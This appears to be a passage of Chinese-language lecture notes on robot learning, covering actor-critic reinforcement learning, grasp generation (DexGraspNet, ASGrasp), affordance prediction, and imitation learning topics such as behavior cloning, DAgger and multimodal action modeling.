其中,$s_{i,t}$ 是在第 $i$ 条轨迹、时刻 $t$ 遇到的状态。

然后,使用神经网络来监督学习就行。

自举(Bootstrap):使用了一个基于当前函数估计的值 $\hat{V}{\phi}^{\pi}(s{i,t+1})$ 来更新同一个函数在另一个点 $s_{i,t}$ 的估计 $\hat{V}{\phi}^{\pi}(s{i,t})$。

关于自举有一个很形象的例子:在河里拽自己的鞋带把自己拽起来。

Actor-Critic

重新回顾 “基线” 这一概念,再结合使用神经网络来估计 $V(s_t)$ 的方法以及策略梯度的公式:

$$ \nabla_\theta J(\theta) = \mathbb{E}{(s_t, a_t) \sim \pi\theta} [ \nabla_\theta \log \pi_\theta(a_t | s_t) A^{\pi_\theta}(s_t, a_t) ] $$

我们就可以很自然的想到 Actor-Critic 方法。

  • Actor(演员):指策略网络 $\pi_\theta(a_t|s_t)$,负责根据状态 $s_t$ 做出动作决策,决定此步的 $r(s_t, a_t)$ 进而影响 $A(s_t, a_t)$
  • Critic(评论家):指价值网络($V_{\phi}(s_t)$ 或者 $Q_{\phi}(s_t, a_t)$,$\phi$ 表示其参数),负责评估 Actor 所处的状态 $s_t$ 或采取的动作 $a_t$ 的好坏(即估计 $V$ 值或 $Q$ 值,进而计算优势 $A$ 值)

在训练完成后,真正推理(干活)的时候,不用 Critic,只用 Actor。

Batch Actor-Critic

循环:

  1. 收集一批完整的轨迹数据
  2. 用这批数据一次性或多次迭代地更新 Critic $\hat{V}_\phi^\pi$(拟合蒙特卡洛回报或 TD 目标)
  3. 用更新后的 Critic 计算整批数据的优势: $$ \hat{A}^\pi(s_t, a_t) = r(s_t, a_t) + \gamma \hat{V}\phi^\pi(s{t+1}) - \hat{V}_\phi^\pi(s_t) $$
  4. 计算整批数据的平均策略梯度: $$ \nabla_\theta J(\theta) = \mathbb{E}{(s_t, a_t) \sim \pi\theta} [ \nabla_\theta \log \pi_\theta(a_t | s_t) \hat{A}^\pi(s_t, a_t) ] $$
  5. 更新 Actor: $$ \theta \leftarrow \theta + \alpha \nabla_\theta J(\theta) $$

Online Actor-Critic

循环:

  1. 在当前状态 $s$,根据策略选择动作 $a \sim \pi_\theta(a|s)$
  2. 执行动作 $a$,观察到奖励 $r$ 和下一个状态 $s'$ 获得一个转换 $(s, a, r, s')$
  3. 立即使用这个转换来更新 Critic $\hat{V}\phi^\pi$(通常使用 TD 目标 $\delta$) $$ \delta = r + \gamma \hat{V}\phi^\pi(s') - \hat{V}\phi^\pi(s) \ L(\phi) \doteq \frac{1}{2} \delta^2 = \frac{1}{2} \left( (r + \gamma \hat{V}\phi^\pi(s')) - \hat{V}\phi^\pi(s) \right)^2 \ \nabla\phi L(\phi) = \frac{\partial L(\phi)}{\partial \delta} \frac{\partial \delta}{\partial \hat{V}\phi^\pi(s)} \nabla\phi \hat{V}\phi^\pi(s) = - \delta \nabla\phi \hat{V}\phi^\pi(s) \ \hat{V}\phi^\pi(s) \leftarrow \hat{V}\phi^\pi(s) + \beta \nabla\phi L(\phi) $$
  4. 立即计算优势函数的估计值,通常就是 TD 误差本身: $$ \hat{A}^\pi(s, a) = \delta = r + \gamma \hat{V}\phi^\pi(s') - \hat{V}\phi^\pi(s) $$
  5. 立即更新 Actor: $$ \theta \leftarrow \theta + \alpha \nabla_\theta J(\theta) \approx \theta + \alpha \nabla_\theta \log \pi_\theta(a|s) \hat{A}^\pi(s, a) $$

Online vs. Batch

  • Online:更新更频繁(每一步都可能更新),数据利用率可能更高(效率高),能适应非平稳环境但单步更新可能带来高方差
  • Batch:更新基于更多数据(如走完一整条轨迹才更新),梯度估计更稳定(方差较低)但需要存储更多数据,更新频率较低

网络架构

ac_arch

  • 分离网络:Actor 和 Critic 使用独立的神经网络。简单稳定,但无特征共享。
  • 共享网络:Actor 和 Critic 共享部分底层网络。参数效率高,但训练可能更复杂。

同步 / 异步

parallel

即使在 Online AC 中,也常常收集一个小批量数据来更新 Critic $\hat{V}_\phi^\pi$ 和 Actor $\theta$,因为这有助于稳定学习过程,降低梯度估计的方差。

并行化(Parallelization):使用多个并行的 Actor(workers)同时在环境中收集经验,可以显著提高数据采集速度和多样性,进一步稳定训练。

并行又可分为同步(Synchronous)和异步(Asynchronous)。同步并行存在同步点,整体速度受限于最慢的 worker。异步并行则没有同步点,会更快。

💾

策略 I

2025年4月16日 06:38

条件抓取生成模型(Conditional Grasp Generative Model)

问题定义与挑战

目标:在一个包含多个物体的杂乱场景(例如,一个箱子里的物品)中,规划灵巧手的抓取动作。

核心挑战:

  1. 避免碰撞:抓取目标物体的同时,要尽量避免与场景中的其他物体或环境发生不必要的碰撞。
  2. 泛化性:模型需要能够泛化到新的物体(不同的几何形状)和新的场景布局(不同的物体分布)。

与单物体抓取的区别:相比于抓取一个孤立的物体,杂乱场景中的抓取规划要复杂得多,因为它需要同时考虑物体间的相互作用和潜在的碰撞。

进阶问题:有些研究会先通过 非抓握操作(Non-prehensile Manipulation,如推、拨) 将目标物体分离出来,简化后续抓取。

DexGraspNet

核心是利用大规模 合成数据(Synthetic Data) 进行训练,并通过深度学习模型来学习抓取策略。

dex_grasp_net

场景理解模块(Scene Understanding)

输入:场景的点云数据。

任务:

  • 预测场景中每个点的 抓取可能性(Graspness):哪些区域适合进行抓取。
  • 区分前景 物体(Objectness) 与背景(如桌面)。

方法:使用一个点云处理网络(如基于稀疏卷积的网络)进行监督学习,标签(Graspness, Objectness)从合成数据中自动生成(由合成数据提供监督信号)。

局部区域提议与特征提取(Local Region Proposal & Feature Extraction)

动机:直接使用整个场景的全局特征(Global Feature)来指导抓取生成存在困难

  • 弱关联性:全局特征与特定位置的抓取动作之间的关联可能不够强,导致以之为条件的条件生成模型学习效果不佳,甚至退化为无条件生成

    老师提到,conditon 最好要和输出结果有很强的 correlation,这样效果更好,且更好建模、泛化。

  • 泛化性差:新场景的全局特征可能与训练数据差异巨大,导致模型难以迁移。

方法:

  • 根据第一步预测的 Graspness Score,选择得分最高的点 (例如 Top 1%)。
  • 围绕这些高分点,提取局部区域(Local Region)的点云。
  • 从这些局部点云区域中提取局部特征(Local Feature)。这些局部特征(如平坦表面、边缘、角落等 几何信息 )在不同场景中更可能重复出现,有助于提升泛化性。

条件抓取生成模块(Conditional Grasp Generation)

输入:上一步提取的局部特征。

任务:生成有效的抓取位姿,包括末端执行器的 6D 位姿(位置 $T$ 和姿态 $R$)以及手的形态(手指配置 $\theta$)。

面临的挑战:抓取的 多模态性(Multi-modality)。对于同一个物体或区域,通常存在多种有效的抓取方式(多峰分布)。如果直接使用回归(Regression)预测单一抓取,模型倾向于输出所有可能抓取的 “平均值”,而这个平均抓取往往是无效的(Mode Average 问题)。

开车避障时,你可以选择左打方向盘或者右打方向盘,但模型为了降低 Loss,会输出平均值 —— 啥都不动,直直撞上去。

解决方案:解耦建模,将抓取生成分解为两个步骤。

  1. 建模末端 6D 位姿的分布:认为末端位姿 $(T, R)$ 的选择具有明显的 多模态特性

    所以,使用一个 条件生成模型 (如 Diffusion Model)来学习在给定局部特征条件下的 位姿分布 $p(T, R | \text{local_feature})$,并从中采样得到 $(T,R)$

  2. 预测手型:假设当末端位姿 $(T, R)$ 固定后,最优的手指形态 $\theta$ 的不确定性大大降低(近似单峰分布)。

    因此,可以使用一个 回归模型,根据采样得到的 $(T, R)$ 和局部特征来预测手型 $\theta = f(T, R, \text{local_feature})$。

生成过程:先从学习到的分布 $p(T, R | \text{local_feature})$ 中采样一个或多个候选的末端位姿 $(T, R)$,然后对每个采样出的位姿预测对应的手型 $\theta$。

实验结果与分析

消融实验证实,使用局部特征作为条件相比于使用全局特征,抓取成功率有显著提升,这验证了局部特征在增强关联性和泛化性方面的关键作用。

Scaling Law:抓取性能与训练数据的规模(抓取样本数量和场景多样性)显著相关,使用合成数据可以大幅提升成功率(10 万~ 1000 万),但存在边界收益递减的问题。

优点

  1. 有效的数据合成管线
  2. 设计了一个 端到端 的框架

局限性

  1. 抓取类型:仅处理包覆式抓取(Power Grasp),没处理指尖抓取(Precision Grasp),如用指尖捏取小物体
  2. 抓取闭合类型:主要使用力封闭抓取(Force-Closure Grasp),但是存在非力封闭的场景(如托起物体)

透明与高反光物体

问题概述

尽管像 GraspNet 这样的方法在许多物体上表现良好,但它们在处理透明(Transparent)或高反光(Highly Specular/Shiny)物体时会遇到巨大挑战。

主要原因在于,目前商用的深度传感器(Commercial Depth Sensor),如基于飞行时间(Time-of-Flight, ToF)或结构光(Structured Light)的传感器,其工作原理依赖于对光线传播的特定假设,例如:

  • 它们假设光线照射到物体表面后会直接反射回来。
  • 结构光方法假设投射的特定光图案(Pattern)在物体表面会发生可预测的漫反射(Diffuse Reflection),通过观察反射图案的变形来推算深度。

然而,对于透明物体,大部分光线会发生折射(Refraction)并穿透物体,而不是反射。对于高反光物体,光线会发生镜面反射(Specular Reflection),形成高光区域,这与传感器通常假设的漫反射模型不符。

这些问题会 导致点云的质量(quality)变差,所以在深度传感器看来,透明或高反光物体的几何结构往往是残缺不全的。

transparent_and_shiny

由于输入的点云质量低下,依赖于几何信息进行抓取规划的方法自然难以有效工作。

ASGrasp

asgrasp

核心目标:深度修复,获得高质量的深度信息。

ASGrasp 采用基于学习的深度感知(Learning-based Depth Sensing)方法,而不依赖固定物理模型的传统方法。

  1. 合成数据驱动:利用图形学渲染技术生成大量的合成数据。每条数据包含一个渲染出的场景图像(RGB Image)和与之对应的 “完美” 深度图或点云(Ground Truth Depth/Point Cloud)。
  2. 监督学习:将(图像,真实深度)作为 配对的监督信号,训练一个深度学习网络。这个网络学习从输入的(可能有问题的)传感器图像直接预测出准确的深度信息 $f: \text{Image} \rightarrow \text{Depth}$。

显然,依赖于合成数据的方法主要挑战在 泛化性(Generalization) 问题。

为了解决泛化性问题,合成数据必须具有足够的 多样性(Diversity)

域随机化(Domain Randomization):在生成合成数据时,尽可能地随机化各种环境和物体参数,使得训练数据覆盖足够广泛的分布,防止对特定条件产生过拟合(overfit),从而让模型对真实世界中未曾见过的变化更具鲁棒性。

域随机化的方面包括:

  1. 物体和布局(Objects and Layout)
  2. 材质(Materials)
  3. 背景(Backgrounds)
  4. 光照(Illumination)
  5. 相机视角(Camera Viewpoints)

除了使用多样化合成数据进行训练。ASGrasp 另一核心是 多模态立体视觉 (Multi-modal Stereo Vision)方案,它同时利用了红外图像(Infrared,IR)和彩色图像(RGB)来估计深度。且其中使用了类似双目视觉的 立体匹配(Stereo Matching) 方法来得到深度信息。

ASGrasp 的独特之处在于其 混合匹配策略

  1. 它首先利用 红外图像对(IR Image Pair) 进行双目立体匹配,红外成像对于某些在可见光下难以处理的材质(如透明、高反光)可能提供更稳定的特征。
  2. 同时,它将 彩色图像(RGB Image) 作为 额外的上下文信息(Additional Context) 融入匹配过程。RGB 图像提供了丰富的颜色和纹理信息,可以帮助消除歧义(disambiguate),或者在 IR 信息不足时提供补充。

在网络结构层面,ASGrasp 采用了在立体匹配领域常见的技术:

  1. 相关性金字塔 / 代价体(Correlation Pyramid / Cost Volume):编码不同视差下的匹配代价。
  2. 由粗到精(Coarse-to-Fine)的优化策略:逐步细化深度图,提高精度。

通过这种方式,ASGrasp 能够生成高质量的深度图,尤其是在处理传统方法难以应对的透明和高反光物体时表现出色。

而拥有了更准确的深度图后,就可以将其输入到后续的抓取规划块中,能够为这些原本难以感知的物体生成有效的抓取位姿。

可供性(Affordance)

前面的讨论主要集中在如何通过视觉感知来抓取物体。然而,机器人的能力不应仅限于抓取,更进一步需要执行各种 操作(Manipulation / Operation)

可供性(Affordance):指一个物体所能支持或提供的交互方式或操作可能性。

它描述了环境或物体向交互者(人或机器人)提供的潜在行动可能性。

例如:

  • 一个抽屉的可供性是它可以被拉出(Pullable)或推入(Pushable)。
  • 一扇门的可供性在于它的门把手可以被抓住(Graspable),并且门可以被打开(Openable)。
  • 一把刀作用于一个水果时,水果的可供性在于它可以在某些区域被切割(Cuttable)。

在机器人学中,我们关注的可供性通常是指:为了让机器人完成某个特定的操作任务,它应该与物体的 哪个区域(Where) 进行交互,以及应该 以何种方式(How) 进行交互。

可供性通常被表示为热力图,也称 可供性图(Affordance Map)。对于不同的动作会有不同的可供性图,指示那个地方适合此类动作。

因此,通过预测这样的可供性地图,机器人就能知道哪些区域是执行特定操作的有效接触点。

Where2Act

利用学习方法来预测物体可供性的工作。

  1. 数据收集:让机器人在仿真或真实环境中对各种物体(尤其是带有可活动部件的铰接物体,articulated objects)进行大量的随机交互尝试(推、拉、拽等)。
  2. 标注:记录下哪些尝试成功了(如成功打开抽屉),哪些失败了。成功的交互区域和方式就构成了正样本训练数据。
  3. 模型训练:训练一个深度学习模型,输入物体的视觉信息(如图像和 / 或点云),输出其可供性图。

Pipeline

where_2_act

输入:2D / 3D

特征融合:将 2D 和 3D 特征进行融合,得到每个点的综合特征 $f_p$。

输出预测:基于融合后的特征 $f_p$,模型会预测多个信息:

  • 交互点(Contact Point):预测哪些点适合进行交互(输出表示可交互性的分数 $a_p$,affordance)。
  • 交互方向(Interaction Direction):预测在某个点上,应该沿着哪个方向进行交互(输出方向 $R_{z|p}$)。这可能需要对方向进行离散化或直接回归。
  • 成功置信度(Success Confidence):预测在该点以预测方向进行交互的成功概率或置信度(输出成功得分 $s_{R|p}$)。

VAT-Mart

VAT-Mart 进一步扩展了可供性的概念,认为仅仅预测交互点和初始方向可能不足以完成复杂的、需要遵循特定路径的操作。

例如,打开一个旋转门,如果只是沿着一个固定方向拉门把手,很快就会因为运动轨迹不匹配而失败。正确的操作需要沿着门转动的弧线运动。

VAT-Mart 不仅预测可供性区域(affordance),还预测出一整条 操作轨迹(trajectory)

视觉驱动的开环方法总结

应用

利用视觉输入进行预测:

  • 预测 物体位姿(Object Pose):通常需要物体的 CAD 模型和抓取标注。
  • 预测 抓取位姿(Grasp Pose):可以直接预测抓取点和姿态,无需 CAD 模型或预定义抓取。
  • 预测 可供性(Affordance):超越简单抓取,指导更广泛的交互操作。

运动规划(Motion Planning):利用预测出的目标(如抓取位姿或交互点 / 轨迹),结合环境信息(避障),规划出机器人手臂的运动路径。

实际执行中,运动规划往往需要结合一些启发式(heuristics)规则或技巧(tricks)来提高成功率和鲁棒性。例如 预抓取(Pre-grasp)位置,先移动到目标抓取点附近的一个安全位置,再直线接近并闭合夹爪,可以避免不必要的碰撞。

局限性

操作复杂度有限:通常只能处理一些预定义好的、相对简单的操作(如开抽屉、开柜门)。更复杂的操作(如转笔)超出了当前基于可供性预测和运动规划的框架能力。主要瓶颈在于启发式规则的设计。

开环执行:规划一次,执行到底。系统根据初始的视觉观测进行规划(抓取位姿、运动轨迹等),然后执行这个预先计算好的计划,在执行过程中 不再接收新的视觉反馈 来调整动作。就像闭着眼睛做事一样。

显然,对于开环来说,一旦执行过程中出现预期之外的情况,例如物体被意外碰到、滑动,或者初始感知 / 规划存在误差,整个任务很可能失败,因为系统无法根据实时变化进行调整。

但是,通过 高频率地重复 “感知 - 规划 - 执行” 的循环,将开环系统近似转化为闭环系统。

策略学习

策略学习(Policy Learning) 旨在解决开环抓取和规划中动态特性不足、无法及时根据环境状态调整的问题。

策略学习的核心在于构建一个能够根据环境状态变化采取合理策略的方案,本质上就是一个 Policy。Policy 拥有闭环执行的潜力,能够更好地适应场景状态的变化,从而使机器人操作更加鲁棒和高动态。

基础约定

  • 状态(State)$s_t$:环境的状态,这些状态通常隐藏在观测之下
  • 观测(Observation)$o_t$:对环境的观测,例如点云或图像。观测蕴含状态的信息,但通常是局部的、片面的。观测是状态的体现,状态是观测的本质
  • 动作(Action)$a_t$:在特定状态或观测下采取的策略,Policy 的目标就是根据场景中的状态变化动态地做出响应
  • 策略(Policy)$\pi(a_t|s_t)$ / $\pi(a_t|o_t)$:Policy 定义了在特定状态 / 观测下应该采取什么样的动作。通常用参数 $\theta$ 来参数化 Policy,记作 $\pi_\theta$

如果 Policy 基于状态 $s_t$ 来决定动作 $a_t$,则称该 Policy 为 Fully Observed 的策略。这意味着所有环境状态都是可观测的,虽然在现实中,我们通常只能获得部分观测。

我们的目标即为学习到这个策略。

模仿学习(Imitation Learning)

策略学习中最简单的方法就是监督学习,即模仿专家的行为。专家在每个状态或观测下给出正确的动作,然后通过监督学习训练 Policy。

示例:Point Goal Navigation

目标:在场景中导航到一个目标点。

传统方法(如 A* 算法):在已知地图的情况下可以找到最短路径。

策略学习:将传统路径规划算法作为老师(提供监督信号),指导 Policy 在每一步应该如何走才能更快到达目标点。

与传统方法的区别:即使没有地图,也可以通过训练一个基于视觉观测的 Policy,从而将策略应用到未建立地图的新场景中。

这是一种典型的模仿学习策略。

模仿学习的执行过程

策略执行过程可以概括如下:

  1. 观测(Observation)$o_t$:观测环境,可能蕴含环境状态的描述。
  2. 策略(Policy)$\pi(a_t|o_t)$:根据观测,Policy 决定采取的动作。
  3. 状态转移(State Transition):采取动作后,环境状态发生改变。

通过这样的方式,逐步迭代执行。

Markov 假设

定义:在任何状态下做判断时,只需根据当前状态来决定接下来应该采取什么动作,无需考虑过去经历了哪些状态。当前状态已经包含了过去历史的充分信息。

Markov 假设并非总是成立。 例如,司机超车时会根据自己的一些历史信息(如右后方是否有车辆)来决定是否变道。

Behavior Cloning

Behavior Cloning (BC) 是一种基本的模仿学习方案。根据观测,数据集包含专家在特定状态下采取的动作。通过监督学习,建立从观测到动作的映射关系,并使用动作层面的监督信号进行梯度回传,从而训练 Policy。

BC 将模仿学习问题视为一个监督学习问题。给定专家在状态 $s$ 下采取的动作 $a$ 的数据集 $D = {(s_i, a_i)}{i=1}^N$,行为克隆的目标是学习一个策略 $\pi\theta(a|s)$,使得在给定状态 $s$ 时,策略输出的动作 $a$ 尽可能接近专家动作 $a^*$。通常通过最小化预测动作与专家动作之间的差异来实现,例如使用均方误差损失:

$$ \theta^* = \arg \min_\theta \sum_{(s_i, a_i^) \in D} || \pi_\theta(s_i) - a_i^ ||^2 $$

BC 历史

1989 年,研究人员使用神经网络处理视觉输入,并将其映射到车辆的行为(方向盘转动角度、油门、刹车等)。这是 Behavior Cloning 的雏形。

2016 年,研究人员尝试使用深度学习方案改进 Behavior Cloning,用于自动驾驶。相比于早期的思路,这些改进包括更深的网络、更多的数据,以及更好的校正机制。即使使用基本的 Behavior Cloning,也能展示出不错的自动驾驶能力。

Distribution Shift

定义:模仿学习依赖于训练数据和测试数据具有较好的分布一致性。当这种分布一致性被打破时,模型很难泛化到测试集。而且,随着时间的推移,偏差会不断增大,尤其是在长序列任务中。一开始可能与训练分布一致,但执行步数越多,偏差越大,最终完全不可回头。

distribution_shift

这是因为:

  1. 专家演示数据通常只覆盖了状态空间中很小的一部分,即专家成功执行任务时所经历的状态。
  2. 学习到的策略 $\pi_\theta$ 不可能完美复制专家策略 $\pi^*$。即使是很小的误差,也会导致智能体在执行过程中逐渐偏离专家的状态分布。
  3. 一旦智能体进入训练数据中未曾出现过的状态,行为克隆训练出的策略可能无法做出正确的决策,导致错误累积,最终可能完全失败。

就像在一个陌生的环境中,有人带路,但之后开始乱走,走到一个完全陌生的环境,就会迷路。除非有专家重新指导,否则无法回到正确的轨迹。

BC 的实际应用

尽管有局限性,但当数据足够大时,Behavior Cloning 仍然可以表现出不错的性能。

遥操作可以通过动捕或机器人主从同步等方式获取专家数据。有了这些数据,就可以通过 BC 进行学习。

  • 合成数据:量大,但可能存在外观(Appearance)和物理(Physics)方面的差异,导致从虚拟环境学习的技能难以迁移到真实场景。需要进行充分的 域随机化(Domain Randomization)
  • 遥操作数据:在真实 / 虚拟场景(虚拟场景中便于数据增强)中采集,可以减少 Appearance 和 Physics 的差异。但代价高昂,且仍然可能存在泛化问题

解决 Distribution Shift 的思路

既然 Distribution Shift 来自于分布的不同,那么解决 Distribution Shift 的核心在于让这两个分布更加对齐(Alignment)。

有两种主要思路:

  1. 改变 $p_{\text{data}}(o_t)$:扩充专家数据的轨迹,使其能够覆盖策略执行过程中可能出现的状态空间。
  2. 改变 $p_{\pi}(o_t)$:给定专家轨迹,更好地拟合专家的轨迹,避免偏离专家的路线。

Dataset Aggregation

Dataset Aggregation(DAgger)是一种改变 $p_{\text{data}}(o_t)$ 的方法,旨在扩充训练数据,使其能够覆盖策略执行过程中可能出现的状态空间。

其核心思想是在训练过程中主动收集策略在执行时遇到的状态,并向专家请教这些状态下的正确动作,然后将这些新的数据加入训练集中。

  1. 初始化:使用初始的专家数据集 $D$ 训练一个初始策略 $\pi_1$。
  2. 迭代执行 (对于 $i = 1, 2, ..., N$):
    1. 执行策略:让当前的策略 $\pi_i$ 在环境中执行,收集遇到的状态序列 $s_1, s_2, ...$ (Rollout)
    2. 专家标注:对于收集到的状态 $s_t$,查询专家策略 $\pi^$,得到专家会采取的动作 $a_t^ = \pi^*(s_t)$。
    3. 数据聚合:将新的状态 - 动作对 $(s_t, a_t^)$ 加入到数据集 $D$ 中,即 $D \leftarrow D \cup {(s_t, a_t^)}$。
    4. 重新训练:使用聚合后的数据集 $D$ 重新训练策略,得到 $\pi_{i+1}$。
  3. 输出:最终得到的策略 $\pi_N$。

通过这种方式,监督数据集不断增长,覆盖实际执行过程中可能看到的各种状态,从而使 Policy 更加可控。

问题:出错了再标注的话,可能会对策略的准确性有所伤害(因为这种情况下你学到的不是完美的 Policy),但通常因为看到新的状态带来的学习经验收益更大。

从最优解中获取(From optimal solution)

利用传统算法,来构建一个传统的最优求解器(如 A* 搜索)。当学习的策略偏离最优路径时,可以使用这个求解器来提供完美的纠正动作,指导策略回到正轨。

从教师策略中学习(From a teacher solution)

我们可以假设存在一个 教师策略,它拥有比 学生策略 更多的 特权信息(Privileged Knowledge),例如仿真环境中的真实状态、物体精确的姿态或物理属性等。

利用这些特权信息,教师策略可以更容易地规划出最优动作。然后,让只能看到部分观测(如图像、点云)的学生策略去模仿教师策略的行为。

这样,即使学生策略偏离了,教师策略也能根据当前状态(利用其特权信息)给出在线的、正确的指导动作。这与仅提供固定的专家轨迹不同,教师策略具有在线适应和纠错能力。

非马尔可夫性与历史信息

传统的行为克隆通常假设环境满足马尔可夫性(Markov Property),即当前动作仅依赖于当前观测状态 $o_t$。然而,在现实世界中,我们通常只能获得 部分观测(Partial Observation) $o_t$,它并不包含环境的完整状态 $s_t$。

例如,一个经验丰富的司机在超车时,其决策可能依赖于几秒前看到的后视镜信息(即历史观测),即使当前观测 $o_t$ 中并没有显示那辆车。在这种情况下,仅根据当前观测 $o_t$ 学习动作 $a_t$ 的策略 $\pi(a_t|o_t)$ 会遇到困难:对于相同的观测 $o_t$,由于历史信息的不同,专家可能采取不同的动作(例如有时超车,有时不超车)。模型试图拟合这种一对多的映射关系,可能会学到一个无效的 “平均” 行为。

一个自然的解决方案是 引入历史信息,即将过去的观测序列 $(o_{t-k}, ..., o_t)$ 作为策略的输入,学习 $\pi(a_t | o_{t-k}, ..., o_t)$。这通常可以通过循环神经网络(RNN)或 Transformer 等序列模型实现。

然而,引入历史信息也带来了新的问题:

  1. 过拟合(Overfitting):输入维度大大增加,模型更容易在训练数据上过拟合,学到一些 spurious correlations(虚假关联),导致泛化能力下降。

  2. 因果混淆(Causal Confusion):模型在学习时,可能错误地将相关性当成了因果关系。

    例如,在自动驾驶数据中,每次踩刹车(action)都伴随着前方出现行人(cause)和刹车灯亮起(effect/correlation)。模型如果只学习到了 “观测到刹车灯亮起” 与 “踩刹车” 之间的关联,而忽略了 “看到行人” 这个真正的原因,就会做出错误的决策。它可能会认为只要刹车灯没亮,就不需要刹车,即使前方有行人。引入历史信息会使得输入维度更高,潜在的虚假关联更多,从而加剧因果混淆的风险。

多峰行为

和之前 DexGrapsNet 提到的一样,专家在面对同一个状态时,可能会有多种同样合理的行为选择。例如,在避障时,专家可能有时选择从左边绕过障碍物,有时选择从右边绕过。这种行为被称为 多峰行为

multi_task_learning

如果使用标准的行为克隆(例如,一个简单的多层感知机 MLP 直接回归动作),模型会试图拟合所有这些不同的专家动作。

  • 对于离散动作,这可能导致模型在不同动作间犹豫不决

  • 对于连续动作(如方向盘角度),模型可能会输出所有专家动作的平均值。

在上面的避障例子中,如果专家演示中左右绕行的概率各半,模型的平均输出可能是 “直行”,直接撞上障碍物。

多峰行为解决方案:对动作分布进行建模

为了解决多峰行为问题,我们需要使用更强大的模型来显式地建模动作的 分布 $\pi(a|s)$,而不是仅仅预测一个单一的确定性动作。

高斯混合模型(Gaussian Mixture Models, GMM)

假设动作分布可以由多个高斯分布的加权和来表示。策略网络输出每个高斯分量的均值(mean)、方差(variance)以及它们的权重(weight)。

$$ p(a|s) = \sum_{k=1}^K w_k(s) \mathcal{N}(a | \mu_k(s), \Sigma_k(s)) $$

其中 $K$ 是预先设定的模式(mode)数量。这种方法的优点是简单直观,但难点在于如何预先确定合适的 $K$ 值。

基于隐变量的模型(Latent Variable Models)

例如变分自编码器(Variational Autoencoder, VAE)。

将动作的生成过程建模为一个包含随机隐变量 $z$ 的条件生成模型 $p(a|s, z)$。通过从隐空间 $z$ 中采样,可以生成多样的动作。

例如,ALOHA 工作就使用了条件 VAE(CVAE)来建模动作分布,其策略 $\pi(a|s)$ 通过先从一个条件先验 $p(z|s)$ 中采样隐变量 $z$,再通过解码器 $p(a|s, z)$ 生成动作。训练时通过最大化证据下界(ELBO)来学习。

$$ \log p(a|s) \ge \mathbb{E}{q(z|s,a)}[\log p(a|s,z)] - D{KL}(q(z|s,a) || p(z|s)) $$

扩散模型(Diffusion Models)

扩散模型可以用来建模复杂的动作分布。

其核心思想是通过一个逐步去噪的过程从纯噪声中生成目标数据(这里是动作)。Diffusion Policy 这项工作就是将扩散模型应用于模仿学习。给定状态 $s$,模型学习一个去噪网络,该网络可以迭代地将一个随机噪声向量转化为符合专家行为分布的动作 $a$。

generate_model

diffusion

自回归建模(Autoregressive Modeling)

对于高维度的动作空间(例如,机械臂的多个关节角度),可以将动作 $a = (a_1, a_2, ..., a_d)$ 的联合分布分解为一系列条件概率的乘积:

$$ p(a|s) = p(a_1|s) p(a_2|s, a_1) \cdots p(a_d|s, a_1, ..., a_{d-1}) $$

然后,对每一维的条件概率 $p(a_i | s, a_1, ..., a_{i-1})$ 进行建模。

一个常用的技巧是先将每一维的连续动作 $a_i$ 进行 离散化(Discretization),将其值域划分为若干个区间(bins)。然后,将建模问题转化为预测在给定条件(状态 $s$ 和之前的动作维度 $a_1, ..., a_{i-1}$)下,当前动作维度 $a_i$ 属于哪个离散区间的概率分布。这变成了一个分类问题,可以用神经网络输出每个区间的概率。通过这种自回归和离散化的方式,可以将复杂的高维连续动作分布建模问题,转化为一系列相对简单的、一维离散概率分布的建模问题。在生成动作时,按顺序依次对每一维进行采样。

多任务学习(Multi-task Learning)

在许多实际场景中,我们收集到的专家数据可能包含执行不同任务(或同一任务的不同目标)的轨迹。例如,导航数据可能包含去往不同目的地的轨迹。

与其为每个任务单独训练一个策略(这会减少每个任务可用的数据量),不如采用 多任务学习 的思路。我们可以训练一个 目标条件化(Goal-conditioned) 的策略 $\pi(a|s, g)$,该策略不仅依赖当前状态 $s$,还依赖于当前要完成的目标 $g$。

这样做的好处是:

  1. 数据效率:所有任务的数据可以一起用来训练一个共享的模型,增加了有效训练数据量。
  2. 知识共享:不同任务之间可能存在共享的子结构或技能(例如,从北大无论开车去哪里,都得先开出北大东门)。多任务学习使得模型可以学习这些共享的知识,并互相促进,可能比单任务学习效果更好。

然而,多任务学习也引入了 目标空间的分布偏移:除了状态空间 $s$ 可能存在分布偏移外,目标空间 $g$ 也可能存在分布偏移。如果在测试时遇到一个训练时从未见过的目标 $g$,策略的泛化能力就面临考验。

模仿学习的局限性

尽管模仿学习(尤其是结合了 DAgger 和先进模型结构后)非常强大,甚至催生了许多成功的应用(如一些基于大模型的机器人控制),但它仍然有其局限性:

  1. 依赖专家数据:需要大量高质量的专家演示数据,获取成本可能很高。
  2. 无法超越专家:策略的性能上限受限于专家的水平。
  3. 不适用于高度动态或不稳定的任务:对于那些需要精确反馈和快速调整的任务(例如,让机器人用指尖转笔),微小的误差就可能导致失败。在这种情况下,仅仅模仿轨迹可能不足以学习到鲁棒的策略,因为系统对状态扰动非常敏感,而专家数据可能无法覆盖所有可能的微小扰动及其纠正措施。

强化学习

懒得详细写了,当年学过强化学习课程已经被狠狠摧残过一遍了。

推荐参照 动手学强化学习 自学。

马尔可夫决策过程(Markov Decision Process,MDP)

$$ \mathcal{M} = {S, \mathcal{A}, \mathcal{T}, r} $$

其中:

  • $\mathcal{A}$:动作空间 (Action Space),智能体可以采取的动作。
  • $\mathcal{T}$:状态转移算子 (Transition Operator),现在依赖于状态和动作,$p(s_{t+1}|s_t, a_t)$。
  • $r$:奖励函数 (Reward Function),$r:S \times \mathcal{A} \to \mathbb{R}$,表示在状态 $s_t$ 执行动作 $a_t$ 后获得的即时奖励 $r(s_t, a_t)$。

部分可观测马尔可夫决策过程(POMDP)

部分可观测马尔可夫决策过程(Partially Observable Markov Decision Process, POMDP)是 MDP 的扩展,其中智能体只能观测到部分状态。

$$ \mathcal{M} = {S, \mathcal{A}, \mathcal{O}, \mathcal{T}, \mathcal{E}, r} $$

其中:

  • $\mathcal{O}$:观测空间 (Observation Space),智能体可以观测到的状态
  • $\mathcal{E}$:观测概率 (Observation Probability),$p(o_t|s_t, a_t)$,描述在真实状态 $s_t$ 下,观测到 $o_t$ 的概率 $p(o_t|s_t)$
  • $\mathcal{T}$:状态转移算子 (Transition Operator),$p(s_{t+1}|s_t, a_t)$

此时,智能体 无法直接知道 当前的真实状态 $s_t$,只能得到一个与 $s_t$ 相关的观测 $o_t$。

强化学习的目标

强化学习:学习一个策略(policy) $\pi_\theta(a|s)$ (由参数 $\theta$ 决定),使得在一个轨迹(trajectory) $\tau =(s_1, a_1, s_2, a_2, ...)$ 上的累积奖励期望最大化。

